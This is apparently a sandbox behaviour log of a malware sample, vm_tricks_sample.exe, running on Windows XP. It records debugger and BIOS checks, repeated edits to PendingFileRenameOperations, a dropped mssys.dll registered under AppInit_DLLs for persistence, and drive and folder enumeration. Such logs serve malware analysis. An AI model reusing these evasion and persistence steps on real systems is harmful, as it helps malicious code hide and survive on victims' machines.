Key value queried Path: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System Name: SystemBiosVersion success or wait 537113815
System info queried Type: ProcessInformation success or wait 537117734
System info queried Type: ProcessInformation success or wait 537241554
System info queried Type: ProcessInformation success or wait 537359156
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application DataDisposition: BothDirectoryInformation Filemask: <.exe no such file 537492953
Key value replaced with new Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Session Manager Name: PendingFileRenameOperations Type: unicode array Data: 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 5C 00 53 00 79 00 73 00 74 00 65 00 6D 00 33 00 32 00 5C 00 73 00 70 00 6F 00 6F 00 6C 00 5C 00 44 00 52 00 49 00 56 00 45 00 52 00 53 00 5C 00 57 00 33 00 32 00 58 00 38 00 36 00 5C 00 33 00 5C 00 4E 00 65 00 77 00 5C 00 6D 00 64 00 69 00 75 00 69 00 2E 00 64 00 6C 00 6C 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 5C 00 53 00 79 00 73 00 74 00 65 00 6D 00 33 00 32 00 5C 00 73 00 70 00 6F 00 6F 00 6C 00 5C 00 44 00 52 00 49 00 56 00 45 00 52 00 53 00 5C 00 57 00 33 00 32 00 58 00 38 00 36 00 5C 00 33 00 5C 00 6D 00 64 00 69 00 75 00 69 00 2E 00 64 00 6C 00 6C 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 44 00 6F 00 63 00 75 00 6D 00 65 00 6E 00 74 00 73 00 20 00 61 00 6E 00 64 00 20 00 53 00 65 00 74 00 74 00 69 00 6E 00 67 00 73 00 5C 00 41 00 64 00 6D 00 69 00 6E 00 69 00 73 00 74 00 72 00 61 00 74 00 6F 00 72 00 5C 00 41 00 70 00 70 00 6C 00 69 00 63 00 61 00 74 00 69 00 6F 00 6E 00 20 00 44 00 61 00 74 00 61 00 5C 00 00 00 00 00 00 00 Old data: 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 5C 00 53 00 79 00 73 00 74 00 65 00 6D 00 33 00 32 00 5C 00 73 00 70 00 6F 00 6F 00 6C 00 5C 00 44 00 52 00 49 00 56 00 45 00 52 00 53 00 5C 00 57 00 33 00 32 00 58 00 38 00 36 00 5C 00 33 00 5C 00 4E 00 65 00 77 00 5C 00 6D 00 64 00 69 00 75 00 69 00 2E 00 64 00 6C 00 6C 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 5C 00 53 00 79 00 73 00 74 00 65 00 6D 00 33 00 32 00 5C 00 73 00 70 00 6F 00 6F 00 6C 00 5C 00 44 00 52 00 49 00 56 00 45 00 52 00 53 00 5C 00 57 00 33 00 32 00 58 00 38 00 36 00 5C 00 33 00 5C 00 6D 00 64 00 69 00 75 00 69 00 2E 00 64 00 6C 00 6C 00 00 00 00 00 success or wait 537513073
Directory Information Queried Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\TempDisposition: BothDirectoryInformation Filemask: <.exe no such file 537526794
Key value replaced with new Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Session Manager Name: PendingFileRenameOperations Type: unicode array Data: 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 5C 00 53 00 79 00 73 00 74 00 65 00 6D 00 33 00 32 00 5C 00 73 00 70 00 6F 00 6F 00 6C 00 5C 00 44 00 52 00 49 00 56 00 45 00 52 00 53 00 5C 00 57 00 33 00 32 00 58 00 38 00 36 00 5C 00 33 00 5C 00 4E 00 65 00 77 00 5C 00 6D 00 64 00 69 00 75 00 69 00 2E 00 64 00 6C 00 6C 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 5C 00 53 00 79 00 73 00 74 00 65 00 6D 00 33 00 32 00 5C 00 73 00 70 00 6F 00 6F 00 6C 00 5C 00 44 00 52 00 49 00 56 00 45 00 52 00 53 00 5C 00 57 00 33 00 32 00 58 00 38 00 36 00 5C 00 33 00 5C 00 6D 00 64 00 69 00 75 00 69 00 2E 00 64 00 6C 00 6C 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 44 00 6F 00 63 00 75 00 6D 00 65 00 6E 00 74 00 73 00 20 00 61 00 6E 00 64 00 20 00 53 00 65 00 74 00 74 00 69 00 6E 00 67 00 73 00 5C 00 41 00 64 00 6D 00 69 00 6E 00 69 00 73 00 74 00 72 00 61 00 74 00 6F 00 72 00 5C 00 41 00 70 00 70 00 6C 00 69 00 63 00 61 00 74 00 69 00 6F 00 6E 00 20 00 44 00 61 00 74 00 61 00 5C 00 00 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 44 00 4F 00 43 00 55 00 4D 00 45 00 7E 00 31 00 5C 00 41 00 44 00 4D 00 49 00 4E 00 49 00 7E 00 31 00 5C 00 4C 00 4F 00 43 00 41 00 4C 00 53 00 7E 00 31 00 5C 00 54 00 65 00 6D 00 70 00 5C 00 00 00 00 00 00 00 Old data: 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 5C 00 53 00 79 00 73 00 74 00 65 00 6D 00 33 00 32 00 5C 00 73 00 70 00 6F 00 6F 00 6C 00 5C 00 44 00 52 00 49 00 56 00 45 00 52 00 53 00 5C 00 57 00 33 00 32 00 58 00 38 00 36 00 5C 00 33 00 5C 00 4E 00 65 00 77 00 5C 00 6D 00 64 00 69 00 75 00 69 00 2E 00 64 00 6C 00 6C 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 5C 00 53 00 79 00 73 00 74 00 65 00 6D 00 33 00 32 00 5C 00 73 00 70 00 6F 00 6F 00 6C 00 5C 00 44 00 52 00 49 00 56 00 45 00 52 00 53 00 5C 00 57 00 33 00 32 00 58 00 38 00 36 00 5C 00 33 00 5C 00 6D 00 64 00 69 00 75 00 69 00 2E 00 64 00 6C 00 6C 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 44 00 6F 00 63 00 75 00 6D 00 65 00 6E 00 74 00 73 00 20 00 61 00 6E 00 64 00 20 00 53 00 65 00 74 00 74 00 69 00 6E 00 67 00 73 00 5C 00 41 00 64 00 6D 00 69 00 6E 00 69 00 73 00 74 00 72 00 61 00 74 00 6F 00 72 00 5C 00 41 00 70 00 70 00 6C 00 69 00 63 00 61 00 74 00 69 00 6F 00 6E 00 20 00 44 00 61 00 74 00 61 00 5C 00 00 00 00 00 00 00 success or wait 537547270
Directory Information Queried Path: C:\WINDOWS\WebDisposition: BothDirectoryInformation Filemask: <.exe no such file 537551463
Key value replaced with new Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Session Manager Name: PendingFileRenameOperations Type: unicode array Data: 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 5C 00 53 00 79 00 73 00 74 00 65 00 6D 00 33 00 32 00 5C 00 73 00 70 00 6F 00 6F 00 6C 00 5C 00 44 00 52 00 49 00 56 00 45 00 52 00 53 00 5C 00 57 00 33 00 32 00 58 00 38 00 36 00 5C 00 33 00 5C 00 4E 00 65 00 77 00 5C 00 6D 00 64 00 69 00 75 00 69 00 2E 00 64 00 6C 00 6C 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 5C 00 53 00 79 00 73 00 74 00 65 00 6D 00 33 00 32 00 5C 00 73 00 70 00 6F 00 6F 00 6C 00 5C 00 44 00 52 00 49 00 56 00 45 00 52 00 53 00 5C 00 57 00 33 00 32 00 58 00 38 00 36 00 5C 00 33 00 5C 00 6D 00 64 00 69 00 75 00 69 00 2E 00 64 00 6C 00 6C 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 44 00 6F 00 63 00 75 00 6D 00 65 00 6E 00 74 00 73 00 20 00 61 00 6E 00 64 00 20 00 53 00 65 00 74 00 74 00 69 00 6E 00 67 00 73 00 5C 00 41 00 64 00 6D 00 69 00 6E 00 69 00 73 00 74 00 72 00 61 00 74 00 6F 00 72 00 5C 00 41 00 70 00 70 00 6C 00 69 00 63 00 61 00 74 00 69 00 6F 00 6E 00 20 00 44 00 61 00 74 00 61 00 5C 00 00 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 44 00 4F 00 43 00 55 00 4D 00 45 00 7E 00 31 00 5C 00 41 00 44 00 4D 00 49 00 4E 00 49 00 7E 00 31 00 5C 00 4C 00 4F 00 43 00 41 00 4C 00 53 00 7E 00 31 00 5C 00 54 00 65 00 6D 00 70 00 5C 00 00 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 5C 00 57 00 45 00 42 00 5C 00 00 00 00 00 00 00 Old data: 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 5C 00 53 00 79 00 73 00 74 00 65 00 6D 00 33 00 32 00 5C 00 73 00 70 00 6F 00 6F 00 6C 00 5C 00 44 00 52 00 49 00 56 00 45 00 52 00 53 00 5C 00 57 00 33 00 32 00 58 00 38 00 36 00 5C 00 33 00 5C 00 4E 00 65 00 77 00 5C 00 6D 00 64 00 69 00 75 00 69 00 2E 00 64 00 6C 00 6C 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 5C 00 53 00 79 00 73 00 74 00 65 00 6D 00 33 00 32 00 5C 00 73 00 70 00 6F 00 6F 00 6C 00 5C 00 44 00 52 00 49 00 56 00 45 00 52 00 53 00 5C 00 57 00 33 00 32 00 58 00 38 00 36 00 5C 00 33 00 5C 00 6D 00 64 00 69 00 75 00 69 00 2E 00 64 00 6C 00 6C 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 44 00 6F 00 63 00 75 00 6D 00 65 00 6E 00 74 00 73 00 20 00 61 00 6E 00 64 00 20 00 53 00 65 00 74 00 74 00 69 00 6E 00 67 00 73 00 5C 00 41 00 64 00 6D 00 69 00 6E 00 69 00 73 00 74 00 72 00 61 00 74 00 6F 00 72 00 5C 00 41 00 70 00 70 00 6C 00 69 00 63 00 61 00 74 00 69 00 6F 00 6E 00 20 00 44 00 61 00 74 00 61 00 5C 00 00 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 44 00 4F 00 43 00 55 00 4D 00 45 00 7E 00 31 00 5C 00 41 00 44 00 4D 00 49 00 4E 00 49 00 7E 00 31 00 5C 00 4C 00 4F 00 43 00 41 00 4C 00 53 00 7E 00 31 00 5C 00 54 00 65 00 6D 00 70 00 5C 00 00 00 00 00 00 00 success or wait 537582511
Process information queried Path: C:\vm_tricks_sample.exe PID: 484 Info Class: DebugPort success or wait 537584911
Process information queried Path: C:\vm_tricks_sample.exe PID: 484 Info Class: DebugPort success or wait 537585887
Process information queried Path: C:\vm_tricks_sample.exe PID: 484 Info Class: DebugObjectHandle port not set 537586189
Process information queried Path: C:\vm_tricks_sample.exe PID: 484 Info Class: DebugFlags success or wait 537588132
File created Path: C:\WINDOWS\mssys.dll Access: read attributes and synchronize and generic write Options: synchronous io non alert and non directory file Attributes: system Content Overwritten: true success or wait 537589911
File write Path: C:\WINDOWS\mssys.dll Offset: unknown Length: 67072 Value: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 f6 40 00 c3 b2 21 6e 90 b2 21 6e 90 b2 21 6e 90 ac 73 ea 90 90 21 6e 90 ac 73 fb 90 a2 21 6e 90 ac 73 ed 90 df 21 6e 90 95 e7 15 90 b1 21 6e 90 b2 21 6f 90 d3 21 6e 90 ac 73 e7 90 b5 21 6e 90 ac 73 ff 90 b3 21 6e 90 52 69 63 68 b2 21 6e 90 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 5d 34 88 4f 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 09 00 00 00 01 00 00 10 00 00 00 b0 05 success or wait 537647432
Key value replaced with new Path: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Name: AppInit_DLLs Type: unicode Data: C:\WINDOWS\mssys.dll Old data: success or wait 537650175
Thread created PID: 484 TID: 384 EIP: 7C8106F9 EAX: 414DC0 Imagepath: C:\vm_tricks_sample.exe success or wait 539559971
Thread created PID: 484 TID: 2032 EIP: 7C8106F9 EAX: 413ED0 Imagepath: C:\vm_tricks_sample.exe success or wait 539667007
Thread created PID: 484 TID: 728 EIP: 7C8106F9 EAX: 4153C0 Imagepath: C:\vm_tricks_sample.exe success or wait 539669851
Thread delayed Time: -120 TID: 728 user apc 539675392
Directory Information Queried Path: \;Z:0000000000008bf9\192.168.0.2\xpanalyzer1\Disposition: BothDirectoryInformation Filemask: * success or wait 539678105
Directory Information Queried Path: \;Z:0000000000008bf9\192.168.0.2\xpanalyzer1\Disposition: BothDirectoryInformation Filemask: unknown success or wait 539682084
Directory Information Queried Path: \;Z:0000000000008bf9\192.168.0.2\xpanalyzer1\export\Disposition: BothDirectoryInformation Filemask: * success or wait 539695761
Directory Information Queried Path: \;Z:0000000000008bf9\192.168.0.2\xpanalyzer1\export\Disposition: BothDirectoryInformation Filemask: unknown success or wait 539699467
Directory Information Queried Path: \;Z:0000000000008bf9\192.168.0.2\xpanalyzer1\export\Disposition: BothDirectoryInformation Filemask: unknown no more files 539700089
Directory Information Queried Path: \;Z:0000000000008bf9\192.168.0.2\xpanalyzer1\syscalls\Disposition: BothDirectoryInformation Filemask: * success or wait 539725797
Directory Information Queried Path: \;Z:0000000000008bf9\192.168.0.2\xpanalyzer1\syscalls\Disposition: BothDirectoryInformation Filemask: unknown success or wait 539729496
Directory Information Queried Path: \;Z:0000000000008bf9\192.168.0.2\xpanalyzer1\syscalls\dump\Disposition: BothDirectoryInformation Filemask: * success or wait 539742043
Directory Information Queried Path: \;Z:0000000000008bf9\192.168.0.2\xpanalyzer1\syscalls\dump\Disposition: BothDirectoryInformation Filemask: unknown success or wait 539750685
Directory Information Queried Path: \;Z:0000000000008bf9\192.168.0.2\xpanalyzer1\syscalls\dump\Disposition: BothDirectoryInformation Filemask: unknown no more files 539751020
Process created PID: 1764 Path: C:\vm_tricks_sample.exe Cmdline: C:\vm_tricks_sample.exe Createflags: none success or wait 539754468
Directory Information Queried Path: \;Z:0000000000008bf9\192.168.0.2\xpanalyzer1\syscalls\Disposition: BothDirectoryInformation Filemask: unknown no more files 539766669
Directory Information Queried Path: \;Z:0000000000008bf9\192.168.0.2\xpanalyzer1\logs\Disposition: BothDirectoryInformation Filemask: * success or wait 540209397
Directory Information Queried Path: \;Z:0000000000008bf9\192.168.0.2\xpanalyzer1\logs\Disposition: BothDirectoryInformation Filemask: unknown success or wait 540212651
Directory Information Queried Path: \;Z:0000000000008bf9\192.168.0.2\xpanalyzer1\logs\Disposition: BothDirectoryInformation Filemask: unknown no more files 540213994
Directory Information Queried Path: \;Z:0000000000008bf9\192.168.0.2\xpanalyzer1\udf\Disposition: BothDirectoryInformation Filemask: * success or wait 540233280
Directory Information Queried Path: \;Z:0000000000008bf9\192.168.0.2\xpanalyzer1\udf\Disposition: BothDirectoryInformation Filemask: unknown success or wait 540236711
Directory Information Queried Path: \;Z:0000000000008bf9\192.168.0.2\xpanalyzer1\udf\Disposition: BothDirectoryInformation Filemask: unknown no more files 540239479
Directory Information Queried Path: \;Z:0000000000008bf9\192.168.0.2\xpanalyzer1\import\Disposition: BothDirectoryInformation Filemask: * success or wait 540257037
Directory Information Queried Path: \;Z:0000000000008bf9\192.168.0.2\xpanalyzer1\import\Disposition: BothDirectoryInformation Filemask: unknown success or wait 540275104
Directory Information Queried Path: \;Z:0000000000008bf9\192.168.0.2\xpanalyzer1\import\shoots\Disposition: BothDirectoryInformation Filemask: * success or wait 540283636
Directory Information Queried Path: \;Z:0000000000008bf9\192.168.0.2\xpanalyzer1\import\shoots\Disposition: BothDirectoryInformation Filemask: unknown success or wait 540293827
Directory Information Queried Path: \;Z:0000000000008bf9\192.168.0.2\xpanalyzer1\import\shoots\Disposition: BothDirectoryInformation Filemask: unknown no more files 540294848
Directory Information Queried Path: \;Z:0000000000008bf9\192.168.0.2\xpanalyzer1\import\Disposition: BothDirectoryInformation Filemask: unknown no more files 540304344
Directory Information Queried Path: \;Z:0000000000008bf9\192.168.0.2\xpanalyzer1\Disposition: BothDirectoryInformation Filemask: unknown no more files 540308811
File opened Path: y: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 540313649
File opened Path: y: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 540313883
File opened Path: x: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 540328658
File opened Path: x: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 540329950
File opened Path: w: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 540331303
File opened Path: w: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 540332165
File opened Path: v: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 540332860
File opened Path: v: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 540333492
File opened Path: u: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 540333992
File opened Path: u: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 540334260
File opened Path: t: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 540334911
File opened Path: t: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 540335137
File opened Path: s: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 540335712
File opened Path: s: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 540335909
File opened Path: r: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 540336237
File opened Path: r: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 540336659
File opened Path: q: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 540336974
File opened Path: q: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 540337743
File opened Path: p: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 540338324
File opened Path: p: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 540338523
File opened Path: o: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 540338856
File opened Path: o: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 540339051
File opened Path: n: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 540340339
File opened Path: n: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 540341471
File opened Path: m: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 540346306
File opened Path: m: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 540346696
File opened Path: l: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 540347934
File opened Path: l: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 540348902
File opened Path: k: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 540350203
File opened Path: k: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 540350426
File opened Path: j: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 540351330
File opened Path: j: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 540351534
File opened Path: i: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 540352488
File opened Path: i: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 540352708
File opened Path: h: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 540354301
File opened Path: h: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 540355281
File opened Path: g: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 540355935
File opened Path: g: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 540356172
File opened Path: f: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 540358050
File opened Path: f: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 540358255
File opened Path: e: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 540359585
File opened Path: e: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 540360086
Directory Information Queried Path: C:\Disposition: BothDirectoryInformation Filemask: * success or wait 540365935
Directory Information Queried Path: C:\Disposition: BothDirectoryInformation Filemask: unknown success or wait 540366148
Directory Information Queried Path: C:\Documents and SettingsDisposition: BothDirectoryInformation Filemask: * success or wait 540369168
Directory Information Queried Path: C:\Documents and SettingsDisposition: BothDirectoryInformation Filemask: unknown success or wait 540374544
Directory Information Queried Path: C:\Documents and Settings\AdministratorDisposition: BothDirectoryInformation Filemask: * success or wait 540383587
Directory Information Queried Path: C:\Documents and Settings\AdministratorDisposition: BothDirectoryInformation Filemask: unknown success or wait 540383818
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application DataDisposition: BothDirectoryInformation Filemask: * success or wait 540387210
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application DataDisposition: BothDirectoryInformation Filemask: unknown success or wait 540390117
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\AdobeDisposition: BothDirectoryInformation Filemask: * success or wait 540392705
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\AdobeDisposition: BothDirectoryInformation Filemask: unknown success or wait 540392890
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\AcrobatDisposition: BothDirectoryInformation Filemask: * success or wait 540397617
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\AcrobatDisposition: BothDirectoryInformation Filemask: unknown success or wait 540397806
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0Disposition: BothDirectoryInformation Filemask: * success or wait 540401611
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0Disposition: BothDirectoryInformation Filemask: unknown success or wait 540419021
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\CollabDisposition: BothDirectoryInformation Filemask: * success or wait 540429355
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\CollabDisposition: BothDirectoryInformation Filemask: unknown success or wait 540445875
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\CollabDisposition: BothDirectoryInformation Filemask: unknown no more files 540446025
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\FormsDisposition: BothDirectoryInformation Filemask: * success or wait 540449599
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\FormsDisposition: BothDirectoryInformation Filemask: unknown success or wait 540449787
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\FormsDisposition: BothDirectoryInformation Filemask: unknown no more files 540450132
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\JavaScriptsDisposition: BothDirectoryInformation Filemask: * success or wait 540456291
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\JavaScriptsDisposition: BothDirectoryInformation Filemask: unknown success or wait 540456463
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\JavaScriptsDisposition: BothDirectoryInformation Filemask: unknown no more files 540456648
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0Disposition: BothDirectoryInformation Filemask: unknown no more files 540468640
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\AcrobatDisposition: BothDirectoryInformation Filemask: unknown no more files 540470568
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\Flash PlayerDisposition: BothDirectoryInformation Filemask: * success or wait 540476408
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\Flash PlayerDisposition: BothDirectoryInformation Filemask: unknown success or wait 540476577
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\Flash Player\AssetCacheDisposition: BothDirectoryInformation Filemask: * success or wait 540482564
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\Flash Player\AssetCacheDisposition: BothDirectoryInformation Filemask: unknown success or wait 540482746
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\Flash Player\AssetCache\4LU5DXRWDisposition: BothDirectoryInformation Filemask: * success or wait 540493814
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\Flash Player\AssetCache\4LU5DXRWDisposition: BothDirectoryInformation Filemask: unknown success or wait 540494001
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\Flash Player\AssetCache\4LU5DXRWDisposition: BothDirectoryInformation Filemask: unknown no more files 540494970
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\Flash Player\AssetCacheDisposition: BothDirectoryInformation Filemask: unknown no more files 540497209
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\Flash PlayerDisposition: BothDirectoryInformation Filemask: unknown no more files 540499184
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\LinguisticsDisposition: BothDirectoryInformation Filemask: * success or wait 540506594
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\LinguisticsDisposition: BothDirectoryInformation Filemask: unknown success or wait 540506763
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\DictionariesDisposition: BothDirectoryInformation Filemask: * success or wait 540515387
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\DictionariesDisposition: BothDirectoryInformation Filemask: unknown success or wait 540516128
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom DictionaryDisposition: BothDirectoryInformation Filemask: * success or wait 540526373
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom DictionaryDisposition: BothDirectoryInformation Filemask: unknown success or wait 540526567
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\allDisposition: BothDirectoryInformation Filemask: * success or wait 540530533
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\allDisposition: BothDirectoryInformation Filemask: unknown success or wait 540532604
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\allDisposition: BothDirectoryInformation Filemask: unknown no more files 540532778
Memory allocated PID: 1764 Path: C:\vm_tricks_sample.exe Base: 400000 Length: 12FAB0 Allocation Type: unknown Protection: page read and write success or wait 540548889
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\grmDisposition: BothDirectoryInformation Filemask: * success or wait 540550761
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\grmDisposition: BothDirectoryInformation Filemask: unknown success or wait 540550956
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\grmDisposition: BothDirectoryInformation Filemask: unknown no more files 540551115
